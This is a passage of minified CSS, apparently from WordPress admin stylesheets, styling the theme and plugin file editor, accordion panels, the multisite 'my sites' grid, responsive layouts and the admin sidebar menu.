label,#theme-plugin-editor-label,#theme-plugin-editor-selector{font-weight:600}#theme-plugin-editor-label{display:inline-block;margin-bottom:1em}#docs-list,#template textarea{direction:ltr}.fileedit-sub #plugin,.fileedit-sub #theme{max-width:40%}.fileedit-sub .alignright{text-align:left}#template p{width:97%}#file-editor-linting-error{margin-top:1em;margin-bottom:1em}#file-editor-linting-error>.notice{margin:0;display:inline-block}#file-editor-linting-error>.notice>p{width:auto}#template .submit{margin-top:1em;padding:0}#template .submit input[type=submit][disabled]{cursor:not-allowed}#templateside{float:left;width:16em;word-wrap:break-word}#postcustomstuff p.submit{margin:0}#templateside h4{margin:1em 0 0}#templateside li{margin:4px 0}#templateside li:not(.howto) a,.theme-editor-php .highlight{display:block;padding:3px 12px 3px 0;text-decoration:none}#templateside li.current-file>a{padding-bottom:0}#templateside li:not(.howto)>a:first-of-type{padding-top:0}#templateside li.howto{padding:6px 12px 12px}.theme-editor-php .highlight{margin:-3px -12px -3px 3px}#templateside .highlight{border:none;font-weight:600}.nonessential{color:#646970;font-size:11px;font-style:italic;padding-right:12px}#documentation{margin-top:10px}#documentation label{line-height:1.8;vertical-align:baseline}.fileedit-sub{padding:10px 0 8px;line-height:180%}#file-editor-warning .file-editor-warning-content{margin:25px}.nav-menus-php .item-edit:before,.widget-top .widget-action .toggle-indicator:before,.wp-customizer .accordion-section-title:after,.wp-customizer .control-section .accordion-section-title:after{content:"\f140";content:"\f140"/'';font:normal 20px/1 dashicons;display:block;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none}.widget-top .widget-action .toggle-indicator:before{padding:1px 0 1px 2px;border-radius:50%}.handlediv,.item-edit,.postbox .handlediv.button-link,.toggle-indicator{color:#646970}.widget-action{color:#50575e}.handlediv:focus,.handlediv:hover,.item-edit:focus,.item-edit:hover,.postbox .handlediv.button-link:focus,.postbox .handlediv.button-link:hover,.sidebar-name:hover .toggle-indicator,.widget-action:focus,.widget-top:hover .widget-action{color:#1d2327;outline:2px solid transparent}.widget-top .widget-action:focus .toggle-indicator:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}#customize-info.open .accordion-section-title:after,.nav-menus-php .menu-item-edit-active .item-edit:before,.widget.open .widget-top .widget-action .toggle-indicator:before,.widget.widget-in-question .widget-top .widget-action .toggle-indicator:before{content:"\f142";content:"\f142"/''}/*! * jQuery UI Draggable/Sortable 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */.ui-draggable-handle,.ui-sortable-handle{touch-action:none}.accordion-section{border-bottom:1px solid #dcdcde;margin:0}.accordion-section.open .accordion-section-content,.no-js .accordion-section .accordion-section-content{display:block}.accordion-section.open:hover{border-bottom-color:#dcdcde}.accordion-section-content{display:none;padding:10px 20px 15px;overflow:hidden;background:#fff}.accordion-section-title{margin:0;position:relative;border-right:1px solid #dcdcde;border-left:1px solid #dcdcde;-webkit-user-select:none;user-select:none}.js .accordion-section-title{cursor:pointer}.js .accordion-section-title:after{position:absolute;top:12px;left:10px;z-index:1}.accordion-section-title:focus{outline:1px solid transparent}.accordion-section-title:focus:after,.accordion-section-title:hover:after{border-color:#a7aaad transparent;outline:1px solid transparent}.cannot-expand .accordion-section-title{cursor:auto}.cannot-expand .accordion-section-title:after{display:none}.control-section .accordion-section-title,.customize-pane-child .accordion-section-title{border-right:none;border-left:none;padding:10px 14px 11px 10px;line-height:1.55;background:#fff}.control-section .accordion-section-title:after,.customize-pane-child .accordion-section-title:after{top:calc(50% - 10px)}.js .control-section .accordion-section-title:focus,.js .control-section .accordion-section-title:hover,.js .control-section.open .accordion-section-title,.js .control-section:hover .accordion-section-title{color:#1d2327;background:#f6f7f7}.control-section.open .accordion-section-title{border-bottom:1px solid #dcdcde}.network-admin .edit-site-actions{margin-top:0}.my-sites{display:block;overflow:auto;zoom:1}.my-sites li{display:block;padding:8px 3%;min-height:130px;margin:0}@media only screen and (max-width:599px){.my-sites li{min-height:0}}@media only screen and (min-width:600px){.my-sites.striped li{background-color:#fff;position:relative}.my-sites.striped li:after{content:"";width:1px;height:100%;position:absolute;top:0;left:0;background:#c3c4c7}}@media only screen and (min-width:600px) and (max-width:699px){.my-sites li{float:right;width:44%}.my-sites.striped li{background-color:#fff}.my-sites.striped li:nth-of-type(odd){clear:right}.my-sites.striped li:nth-of-type(2n+2):after{content:none}.my-sites li:nth-of-type(4n+1),.my-sites li:nth-of-type(4n+2){background-color:#f6f7f7}}@media only screen and (min-width:700px) and (max-width:1199px){.my-sites li{float:right;width:27.333333%;background-color:#fff}.my-sites.striped li:nth-of-type(3n+3):after{content:none}.my-sites li:nth-of-type(6n+1),.my-sites li:nth-of-type(6n+2),.my-sites li:nth-of-type(6n+3){background-color:#f6f7f7}}@media only screen and (min-width:1200px) and (max-width:1399px){.my-sites li{float:right;width:21%;padding:8px 2%;background-color:#fff}.my-sites.striped li:nth-of-type(4n+1){clear:right}.my-sites.striped li:nth-of-type(4n+4):after{content:none}.my-sites li:nth-of-type(8n+1),.my-sites li:nth-of-type(8n+2),.my-sites li:nth-of-type(8n+3),.my-sites li:nth-of-type(8n+4){background-color:#f6f7f7}}@media only screen and (min-width:1400px) and (max-width:1599px){.my-sites li{float:right;width:16%;padding:8px 2%;background-color:#fff}.my-sites.striped li:nth-of-type(5n+1){clear:right}.my-sites.striped li:nth-of-type(5n+5):after{content:none}.my-sites li:nth-of-type(10n+1),.my-sites li:nth-of-type(10n+2),.my-sites li:nth-of-type(10n+3),.my-sites li:nth-of-type(10n+4),.my-sites li:nth-of-type(10n+5){background-color:#f6f7f7}}@media only screen and (min-width:1600px){.my-sites li{float:right;width:12.666666%;padding:8px 2%;background-color:#fff}.my-sites.striped li:nth-of-type(6n+1){clear:right}.my-sites.striped li:nth-of-type(6n+6):after{content:none}.my-sites li:nth-of-type(12n+1),.my-sites li:nth-of-type(12n+2),.my-sites li:nth-of-type(12n+3),.my-sites li:nth-of-type(12n+4),.my-sites li:nth-of-type(12n+5),.my-sites li:nth-of-type(12n+6){background-color:#f6f7f7}}.my-sites li a{text-decoration:none}@media print,(min-resolution:120dpi){div.star-holder,div.star-holder .star-rating{background:url(../images/stars-2x.png?ver=20121108) repeat-x bottom right;background-size:21px 37px}.spinner{background-image:url(../images/spinner-2x.gif)}}@media screen and (max-width:782px){html.wp-toolbar{padding-top:var(--wp-admin--admin-bar--height)}.screen-reader-shortcut:focus{top:-39px}.block-editor-page .screen-reader-shortcut:focus{top:7px}.screen-reader-shortcut[href="#wp-toolbar"]{display:none}body{min-width:240px;overflow-x:hidden}body *{-webkit-tap-highlight-color:transparent!important}#wpcontent{position:relative;margin-right:0;padding-right:10px}#wpbody-content{padding-bottom:100px}.wrap{clear:both;margin-left:12px;margin-right:0}#col-left,#col-right{float:none;width:auto}#col-left .col-wrap,#col-right .col-wrap{padding:0}#collapse-menu,.post-format-select{display:none!important}.wrap h1.wp-heading-inline{margin-bottom:.5em}.wrap .add-new-h2,.wrap .add-new-h2:active,.wrap .page-title-action,.wrap .page-title-action:active{padding:0 14px;font-size:14px;white-space:nowrap;min-height:40px;line-height:2.71428571;vertical-align:middle}.media-upload-form div.error,.notice,.wrap div.error,.wrap div.updated{margin:20px 0 10px;padding:5px 10px;font-size:14px;line-height:175%}.wp-core-ui .notice.is-dismissible{padding-left:46px}.notice-dismiss{padding:13px}.wrap .icon32+h2{margin-top:-2px}.wp-responsive-open #wpbody{left:-16em}code{word-wrap:break-word;word-wrap:anywhere;word-break:break-word}.postbox{font-size:14px}.metabox-holder .postbox>h3,.metabox-holder .stuffbox>h3,.metabox-holder h2,.metabox-holder h3.hndle{padding:12px}.nav-menus-php .metabox-holder h3{padding:0}.postbox .handlediv{margin-top:3px}.subsubsub{font-size:16px;text-align:center;margin-bottom:15px}#template .CodeMirror,#template textarea{box-sizing:border-box}#templateside{float:none;width:auto}#templateside>ul{border-right:1px solid #dcdcde}#templateside li{margin:0}#templateside li:not(.howto) a{display:block;padding:5px}#templateside li.howto{padding:12px}#templateside .highlight{padding:5px;margin-right:-5px;margin-top:-5px}#template .notice,#template>div{float:none;margin:1em 0;width:auto}#template .CodeMirror,#template textarea{width:100%}#templateside ul ul{padding-right:1.5em}[role=treeitem] .folder-label{display:block;padding:5px}.tree-folder .tree-folder::after,.tree-folder>li::after,.tree-folder>li::before{right:-8px}.tree-folder>li::before{top:0;height:13px}.tree-folder>.current-file::before{right:-5px;top:7px;width:4px}.tree-folder>.current-file::after{height:9px;right:-8px}.wrap #templateside span.notice{margin-right:-5px;width:100%}.fileedit-sub .alignright{float:right;margin-top:15px;width:100%;text-align:right}.fileedit-sub .alignright label{display:block}.fileedit-sub #plugin,.fileedit-sub #theme{margin-right:0;max-width:70%}.fileedit-sub input[type=submit]{margin-bottom:0}#documentation label[for=docs-list]{display:block}#documentation select[name=docs-list]{margin-right:0;max-width:60%}#documentation input[type=button]{margin-bottom:0}#wpfooter{display:none}#comments-form .checkforspam{display:none}.edit-comment-author{margin:2px 0 0}.filter-drawer .filter-group-feature input,.filter-drawer .filter-group-feature label{line-height:2.1}.filter-drawer .filter-group-feature label{margin-right:32px}.wp-filter .button.drawer-toggle{font-size:13px;line-height:2;height:28px}#screen-meta #contextual-help-wrap{overflow:visible}#screen-meta #contextual-help-back,#screen-meta .contextual-help-sidebar{display:none}#screen-meta .contextual-help-tabs{clear:both;width:100%;float:none}#screen-meta .contextual-help-tabs ul{margin:0 0 1em;padding:1em 0 0}#screen-meta .contextual-help-tabs .active{margin:0}#screen-meta .contextual-help-tabs-wrap{clear:both;max-width:100%;float:none}#screen-meta,#screen-meta-links{margin-left:10px}#screen-meta-links{margin-bottom:20px}#screen-meta-links .show-settings:after{line-height:1.9}.wp-filter .search-form input[type=search]{font-size:1rem}.wp-filter .search-form.search-plugins{min-width:100%}}@media screen and (max-width:600px){#wpwrap.wp-responsive-open{overflow-x:hidden}html.wp-toolbar{padding-top:0}.screen-reader-shortcut:focus{top:7px}#wpbody{padding-top:46px}div#post-body.metabox-holder.columns-1{overflow-x:hidden}.nav-tab-wrapper,.wrap h2.nav-tab-wrapper,h1.nav-tab-wrapper{border-bottom:0}h1 .nav-tab,h2 .nav-tab,h3 .nav-tab,nav .nav-tab{margin:10px 0 0 10px;border-bottom:1px solid #c3c4c7}.nav-tab-active:focus,.nav-tab-active:focus:active,.nav-tab-active:hover{border-bottom:1px solid #c3c4c7}.wp-filter .search-form.search-plugins label{width:100%}}@media screen and (max-width:480px){.metabox-prefs-container{display:grid}.metabox-prefs-container>*{display:inline-block;padding:2px}}@media screen and (max-width:320px){#network_dashboard_right_now .subsubsub{font-size:14px;text-align:right}}/*! This file is auto-generated */ #adminmenu,#adminmenu .wp-submenu,#adminmenuback,#adminmenuwrap{width:160px;background-color:#1d2327}#adminmenuback{position:fixed;top:0;bottom:-120px;z-index:1;outline:1px solid transparent}.php-error #adminmenuback{position:absolute}.php-error #adminmenuback,.php-error #adminmenuwrap{margin-top:2em}#adminmenu{clear:right;margin:12px 0;padding:0;list-style:none}.folded #adminmenu,.folded #adminmenu li.menu-top,.folded #adminmenuback,.folded #adminmenuwrap{width:36px}.menu-icon-appearance div.wp-menu-image,.menu-icon-comments div.wp-menu-image,.menu-icon-dashboard div.wp-menu-image,.menu-icon-generic div.wp-menu-image,.menu-icon-links div.wp-menu-image,.menu-icon-media div.wp-menu-image,.menu-icon-page div.wp-menu-image,.menu-icon-plugins div.wp-menu-image,.menu-icon-post div.wp-menu-image,.menu-icon-settings div.wp-menu-image,.menu-icon-site div.wp-menu-image,.menu-icon-tools div.wp-menu-image,.menu-icon-users div.wp-menu-image{background-image:none!important}#adminmenuwrap{position:relative;float:right;z-index:9990}#adminmenu *{-webkit-user-select:none;user-select:none}#adminmenu li{margin:0;padding:0}#adminmenu a{display:block;line-height:1.3;padding:2px 5px;color:#f0f0f1}#adminmenu .wp-submenu a{color:#c3c4c7;color:rgba(240,246,252,.7);font-size:13px;line-height:1.4;margin:0;padding:5px 0}#adminmenu .wp-submenu a:focus,#adminmenu .wp-submenu a:hover{background:0 0}#adminmenu .wp-submenu a:focus,#adminmenu .wp-submenu a:hover,#adminmenu a:hover,#adminmenu li.menu-top>a:focus{color:#72aee6}#adminmenu a:focus,#adminmenu a:hover,.folded #adminmenu .wp-submenu-head:hover{box-shadow:inset -4px 0 0 0 currentColor;transition:box-shadow .1s linear;border-radius:0}#adminmenu li.menu-top{border:none;min-height:34px;position:relative}#adminmenu .wp-submenu{list-style:none;position:absolute;top:-1000em;right:160px;overflow:visible;word-wrap:break-word;padding:6px 0;z-index:9999;background-color:#2c3338;box-shadow:0 3px 5px rgba(0,0,0,.2)}#adminmenu a.menu-top:focus+.wp-submenu,.js #adminmenu .opensub .wp-submenu,.js #adminmenu .sub-open,.no-js li.wp-has-submenu:hover .wp-submenu{top:-1px}#adminmenu a.wp-has-current-submenu:focus+.wp-submenu{top:0}#adminmenu .wp-has-current-submenu .wp-submenu,#adminmenu .wp-has-current-submenu .wp-submenu.sub-open,#adminmenu .wp-has-current-submenu.opensub .wp-submenu,.no-js li.wp-has-current-submenu:hover .wp-submenu{position:relative;z-index:3;top:auto;right:auto;left:auto;bottom:auto;border:0 none;margin-top:0;box-shadow:none}.folded #adminmenu .wp-has-current-submenu .wp-submenu{box-shadow:0 3px 5px rgba(0,0,0,.2)}#adminmenu li.menu-top:hover,#adminmenu li.opensub>a.menu-top,#adminmenu li>a.menu-top:focus{position:relative;background-color:#1d2327;color:#72aee6}.folded #adminmenu li.menu-top:hover,.folded #adminmenu li.opensub>a.menu-top,.folded #adminmenu li>a.menu-top:focus{z-index:10000}#adminmenu .wp-has-current-submenu .wp-submenu .wp-submenu-head,#adminmenu li.current a.menu-top,#adminmenu li.wp-has-current-submenu a.wp-has-current-submenu{background:#2271b1;color:#fff}.folded #adminmenu .opensub .wp-submenu,.folded #adminmenu .wp-has-current-submenu .wp-submenu.sub-open,.folded #adminmenu .wp-has-current-submenu a.menu-top:focus+.wp-submenu,.folded #adminmenu .wp-has-current-submenu.opensub .wp-submenu,.folded #adminmenu .wp-submenu.sub-open,.folded #adminmenu a.menu-top:focus+.wp-submenu,.no-js.folded #adminmenu .wp-has-submenu:hover .wp-submenu{top:0;right:36px}.folded #adminmenu .wp-has-current-submenu .wp-submenu,.folded #adminmenu a.wp-has-current-submenu:focus+.wp-submenu{position:absolute;top:-1000em}#adminmenu .wp-not-current-submenu .wp-submenu,.folded #adminmenu .wp-has-current-submenu .wp-submenu{min-width:160px;width:auto;border:1px solid transparent;border-right-width:5px}#adminmenu .opensub .wp-submenu li.current a,#adminmenu .wp-submenu li.current,#adminmenu .wp-submenu li.current a,#adminmenu .wp-submenu li.current a:focus,#adminmenu .wp-submenu li.current a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a{color:#fff}#adminmenu .wp-not-current-submenu li>a,.folded #adminmenu .wp-has-current-submenu li>a{padding-left:16px;padding-right:14px;transition:all .1s ease-in-out,outline 0s}#adminmenu .wp-has-current-submenu ul>li>a,.folded #adminmenu li.menu-top .wp-submenu>li>a{padding:5px 12px}#adminmenu .wp-submenu-head,#adminmenu a.menu-top{font-size:14px;font-weight:400;line-height:1.3;padding:0}#adminmenu .wp-submenu-head{display:none}.folded #adminmenu .wp-menu-name{position:absolute;right:-999px}.folded #adminmenu .wp-submenu-head{display:block}#adminmenu .wp-submenu li{padding:0;margin:0}#adminmenu .wp-menu-image img{padding:9px 0 0;opacity:.6}#adminmenu div.wp-menu-name{padding:8px 36px 8px 8px;overflow-wrap:break-word;word-wrap:break-word;-ms-word-break:break-all;word-break:break-word;hyphens:auto}#adminmenu div.wp-menu-image{float:right;width:36px;height:34px;margin:0;text-align:center}#adminmenu div.wp-menu-image.svg{background-repeat:no-repeat;background-position:center;background-size:20px auto}div.wp-menu-image:before{color:#a7aaad;color:rgba(240,246,252,.6);padding:7px 0;transition:all .1s ease-in-out}#adminmenu div.wp-menu-image:before{color:#a7aaad;color:rgba(240,246,252,.6)}#adminmenu .current div.wp-menu-image:before,#adminmenu .wp-has-current-submenu div.wp-menu-image:before,#adminmenu a.current:hover div.wp-menu-image:before,#adminmenu a.wp-has-current-submenu:hover div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu:hover div.wp-menu-image:before{color:#fff}#adminmenu li a:focus div.wp-menu-image:before,#adminmenu li.opensub div.wp-menu-image:before,#adminmenu li:hover div.wp-menu-image:before{color:#72aee6}.folded #adminmenu div.wp-menu-image{width:35px;height:30px;position:absolute;z-index:25}.folded #adminmenu a.menu-top{height:34px}.sticky-menu #adminmenuwrap{position:fixed}ul#adminmenu a.wp-has-current-submenu{position:relative}ul#adminmenu a.wp-has-current-submenu:after,ul#adminmenu>li.current>a.current:after{left:0;border:solid 8px transparent;content:" ";height:0;width:0;position:absolute;pointer-events:none;border-left-color:#f0f0f1;top:50%;margin-top:-8px}.folded ul#adminmenu li.wp-has-current-submenu:focus-within a.wp-has-current-submenu:after,.folded ul#adminmenu li:hover a.wp-has-current-submenu:after{display:none}.folded ul#adminmenu a.wp-has-current-submenu:after,.folded ul#adminmenu>li a.current:after{border-width:4px;margin-top:-4px}#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after,#adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after{left:0;border:8px solid transparent;content:" ";height:0;width:0;position:absolute;pointer-events:none;top:10px;z-index:10000}.folded ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after,.folded ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after{border-width:4px;margin-top:-4px;top:18px}#adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after,#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after{border-left-color:#2c3338}#adminmenu li.menu-top:hover .wp-menu-image img,#adminmenu li.wp-has-current-submenu .wp-menu-image img{opacity:1}#adminmenu li.wp-menu-separator{height:5px;padding:0;margin:0 0 6px;cursor:inherit}#adminmenu div.separator{height:2px;padding:0}#adminmenu .wp-submenu .wp-submenu-head{color:#fff;font-weight:400;font-size:14px;padding:5px 11px 5px 4px;margin:-8px -5px 4px -1px;border-width:3px 5px 3px 1px;border-style:solid;border-color:transparent}#adminmenu li.current,.folded #adminmenu li.wp-menu-open{border:0 none}#adminmenu .awaiting-mod,#adminmenu .menu-counter,#adminmenu .update-plugins{display:inline-block;vertical-align:top;box-sizing:border-box;margin:1px 2px -1px 0;padding:0 5px;min-width:18px;height:18px;border-radius:9px;background-color:#d63638;color:#fff;font-size:11px;line-height:1.6;text-align:center;z-index:26}#adminmenu li a.wp-has-current-submenu .update-plugins,#adminmenu li.current a .awaiting-mod{background-color:#d63638;color:#fff}#adminmenu li span.count-0{display:none}#collapse-button{display:block;width:100%;height:34px;margin:0;border:none;padding:0;position:relative;overflow:visible;background:0 0;color:#a7aaad;cursor:pointer}#collapse-button:hover{color:#72aee6}#collapse-button:focus{color:#72aee6;outline:1px solid transparent;outline-offset:-1px}#collapse-button .collapse-button-icon,#collapse-button .collapse-button-label{display:block;position:absolute;top:0;right:0}#collapse-button .collapse-button-label{top:8px}#collapse-button .collapse-button-icon{width:36px;height:34px}#collapse-button .collapse-button-label{padding:0 36px 0 0}.folded #collapse-button .collapse-button-label{display:none}#collapse-button .collapse-button-icon:after{content:"\f148";content:"\f148"/'';display:block;position:relative;top:7px;text-align:center;font:normal 20px/1 dashicons!important;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.folded #collapse-button .collapse-button-icon:after,.rtl #collapse-button .collapse-button-icon:after{transform:rotate(180deg)}.rtl.folded #collapse-button .collapse-button-icon:after{transform:none}#collapse-button .collapse-button-icon:after,#collapse-button .collapse-button-label{transition:all .1s ease-in-out}li#wp-admin-bar-menu-toggle{display:none}.customize-support #menu-appearance a[href="themes.php?page=custom-background"],.customize-support #menu-appearance a[href="themes.php?page=custom-header"]{display:none}@media only screen and (max-width:960px){.auto-fold #wpcontent,.auto-fold #wpfooter{margin-right:36px}.auto-fold #adminmenu,.auto-fold #adminmenu li.menu-top,.auto-fold #adminmenuback,.auto-fold #adminmenuwrap{width:36px}.auto-fold #adminmenu .opensub .wp-submenu,.auto-fold #adminmenu .wp-has-current-submenu .wp-submenu.sub-open,.auto-fold #adminmenu .wp-has-current-submenu a.menu-top:focus+.wp-submenu,.auto-fold #adminmenu .wp-has-current-submenu.opensub .wp-submenu,.auto-fold #adminmenu .wp-submenu.sub-open,.auto-fold #adminmenu a.menu-top:focus+.wp-submenu{top:0;right:36px}.auto-fold #adminmenu .wp-has-current-submenu .wp-submenu,.auto-fold #adminmenu a.wp-has-current-submenu:focus+.wp-submenu{position:absolute;top:-1000em;margin-left:-1px;padding:6px 0;z-index:9999}.auto-fold #adminmenu .wp-has-current-submenu .wp-submenu{min-width:160px;width:auto;border:1px solid transparent;border-right-width:5px}.auto-fold #adminmenu .wp-has-current-submenu li>a{padding-left:16px;padding-right:14px}.auto-fold #adminmenu li.menu-top .wp-submenu>li>a{padding-right:12px}.auto-fold #adminmenu .wp-menu-name{position:absolute;right:-999px}.auto-fold #adminmenu .wp-submenu-head{display:block}.auto-fold #adminmenu div.wp-menu-image{height:30px;width:34px;position:absolute;z-index:25}.auto-fold #adminmenu a.menu-top{min-height:34px}.auto-fold #adminmenu li.wp-menu-open{border:0 none}.auto-fold #adminmenu .wp-has-current-submenu.menu-top-last{margin-bottom:0}.auto-fold ul#adminmenu li:focus-within a.wp-has-current-submenu:after,.auto-fold ul#adminmenu li:hover a.wp-has-current-submenu:after{display:none}.auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after,.auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after{border-width:4px;margin-top:-4px;top:16px}.auto-fold ul#adminmenu a.wp-has-current-submenu:after,.auto-fold ul#adminmenu>li a.current:after{border-width:4px;margin-top:-4px}.auto-fold #adminmenu li.menu-top:hover,.auto-fold #adminmenu li.opensub>a.menu-top,.auto-fold #adminmenu li>a.menu-top:focus{z-index:10000}.auto-fold #collapse-menu .collapse-button-label{display:none}.auto-fold #collapse-button .collapse-button-icon:after{transform:rotate(180deg)}.rtl.auto-fold #collapse-button .collapse-button-icon:after{transform:none}}@media screen and (max-width:782px){.auto-fold #wpcontent{position:relative;margin-right:0;padding-right:10px}.sticky-menu #adminmenuwrap{position:relative;z-index:auto;top:0}.auto-fold #adminmenu,.auto-fold #adminmenuback,.auto-fold #adminmenuwrap{position:absolute;width:190px;z-index:100}.auto-fold #adminmenuback{position:fixed}.auto-fold #adminmenuback,.auto-fold #adminmenuwrap{display:none}.auto-fold .wp-responsive-open #adminmenuback,.auto-fold .wp-responsive-open #adminmenuwrap{display:block}.auto-fold #adminmenu li.menu-top{width:100%}.auto-fold #adminmenu li a{font-size:16px;padding:5px}.auto-fold #adminmenu li.menu-top .wp-submenu>li>a{padding:10px 20px 10px 10px}.auto-fold #adminmenu .wp-menu-name{position:static}.auto-fold ul#adminmenu a.wp-has-current-submenu:after,.auto-fold ul#adminmenu>li.current>a.current:after{border-width:8px;margin-top:-8px}.auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after,.auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after{display:none}#adminmenu .wp-submenu{position:relative;display:none}.auto-fold #adminmenu .selected .wp-submenu,.auto-fold #adminmenu .wp-menu-open .wp-submenu{position:relative;display:block;top:0;right:-1px;box-shadow:none}.auto-fold #adminmenu .selected .wp-submenu:after,.auto-fold #adminmenu .wp-menu-open .wp-submenu:after{display:none}.auto-fold #adminmenu .opensub .wp-submenu{display:none}.auto-fold #adminmenu .selected .wp-submenu{display:block}.auto-fold ul#adminmenu li:focus-within a.wp-has-current-submenu:after,.auto-fold ul#adminmenu li:hover a.wp-has-current-submenu:after{display:block}.auto-fold #adminmenu .wp-has-current-submenu a.menu-top:focus+.wp-submenu,.auto-fold #adminmenu a.menu-top:focus+.wp-submenu{position:relative;right:-1px;left:0;top:0}#adminmenu .wp-not-current-submenu .wp-submenu,.auto-fold #adminmenu .wp-has-current-submenu .wp-submenu,.folded #adminmenu .wp-has-current-submenu .wp-submenu{border:none}#adminmenu .wp-submenu .wp-submenu-head{display:none}#wp-responsive-toggle{position:fixed;top:5px;right:4px;padding-left:10px;z-index:99999;border:none;box-sizing:border-box}#wpadminbar #wp-admin-bar-menu-toggle a{display:block;padding:0;overflow:hidden;outline:0;text-decoration:none;border:1px solid transparent;background:0 0;height:44px;margin-right:-1px}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a{background:#2c3338}li#wp-admin-bar-menu-toggle{display:block}#wpadminbar #wp-admin-bar-menu-toggle a:hover{border:1px solid transparent}#wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before{content:"\f228";display:inline-block;float:right;font:normal 40px/45px dashicons;vertical-align:middle;outline:0;margin:0;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;height:44px;width:50px;padding:0;border:none;text-align:center;text-decoration:none;box-sizing:border-box}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before{color:#72aee6}}@media screen and (max-width:600px){#adminmenuback,#adminmenuwrap{display:none}.wp-responsive-open #adminmenuback,.wp-responsive-open #adminmenuwrap{display:block}.auto-fold #adminmenu{top:46px}}/*! This file is auto-generated */ #wpwrap{height:auto;min-height:100%;width:100%;position:relative;-webkit-font-smoothing:subpixel-antialiased}#wpcontent{height:100%;padding-left:20px}#wpcontent,#wpfooter{margin-left:160px}.folded #wpcontent,.folded #wpfooter{margin-left:36px}#wpbody-content{padding-bottom:65px;float:left;width:100%;overflow:visible}.inner-sidebar{float:right;clear:right;display:none;width:281px;position:relative}.columns-2 .inner-sidebar{margin-right:auto;width:286px;display:block}.columns-2 .inner-sidebar #side-sortables,.inner-sidebar #side-sortables{min-height:300px;width:280px;padding:0}.has-right-sidebar .inner-sidebar{display:block}.has-right-sidebar #post-body{float:left;clear:left;width:100%;margin-right:-2000px}.has-right-sidebar #post-body-content{margin-right:300px;float:none;width:auto}#col-left{float:left;width:35%}#col-right{float:right;width:65%}#col-left .col-wrap{padding:0 6px 0 0}#col-right .col-wrap{padding:0 0 0 6px}.alignleft{float:left}.alignright{float:right}.textleft{text-align:left}.textright{text-align:right}.clear{clear:both}.wp-clearfix:after{content:"";display:table;clear:both}.screen-reader-text,.screen-reader-text span,.ui-helper-hidden-accessible{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important;word-break:normal!important}.button .screen-reader-text{height:auto}.screen-reader-text+.dashicons-external{margin-top:-1px;margin-left:2px;text-decoration:none}.screen-reader-shortcut{position:absolute;top:-1000em;left:6px;height:auto;width:auto;display:block;font-size:14px;font-weight:600;padding:15px 23px 14px;background:#fff;color:var(--wp-admin-theme-color,#3858e9);z-index:100000;line-height:normal}.screen-reader-shortcut:focus{top:-25px;color:var(--wp-admin-theme-color,#3858e9);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);text-decoration:none;outline:2px solid transparent;outline-offset:-2px}.hidden,.js .closed .inside,.js .hide-if-js,.js .wp-core-ui .hide-if-js,.js.wp-core-ui .hide-if-js,.no-js .hide-if-no-js,.no-js .wp-core-ui .hide-if-no-js,.no-js.wp-core-ui .hide-if-no-js{display:none}#menu-management .menu-edit,#menu-settings-column .accordion-container,.comment-ays,.feature-filter,.manage-menus,.menu-item-handle,.popular-tags,.stuffbox,.widget-inside,.widget-top,.widgets-holder-wrap,.wp-editor-container,p.popular-tags,table.widefat{border:1px solid #c3c4c7;box-shadow:0 1px 1px rgba(0,0,0,.04)}.comment-ays,.feature-filter,.popular-tags,.stuffbox,.widgets-holder-wrap,.wp-editor-container,p.popular-tags,table.widefat{background:#fff}body,html{height:100%;margin:0;padding:0}body{background:#f0f0f1;color:#3c434a;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;font-size:13px;line-height:1.4em;min-width:600px}body.iframe{min-width:0;padding-top:1px}body.modal-open{overflow:hidden}body.mobile.modal-open #wpwrap{overflow:hidden;position:fixed;height:100%}iframe,img{border:0}td{font-family:inherit;font-size:inherit;font-weight:inherit;line-height:inherit}a{color:#2271b1;transition-property:border,background,color;transition-duration:.05s;transition-timing-function:ease-in-out}a,div{outline:0}a:active,a:hover{color:#135e96}.wp-person a:focus .gravatar,a:focus,a:focus .media-icon img,a:focus .plugin-icon{color:#043959;border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}#adminmenu a:focus{box-shadow:none;outline:1px solid transparent;outline-offset:-1px}.screen-reader-text:focus{box-shadow:none;outline:0}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}.wp-die-message,p{font-size:13px;line-height:1.5;margin:1em 0}blockquote{margin:1em}dd,li{margin-bottom:6px}h1,h2,h3,h4,h5,h6{display:block;font-weight:600}h1{color:#1d2327;font-size:2em;margin:.67em 0}h2,h3{color:#1d2327;font-size:1.3em;margin:1em 0}.update-core-php h2{margin-top:4em}.update-messages h2,.update-php h2,h4{font-size:1em;margin:1.33em 0}h5{font-size:.83em;margin:1.67em 0}h6{font-size:.67em;margin:2.33em 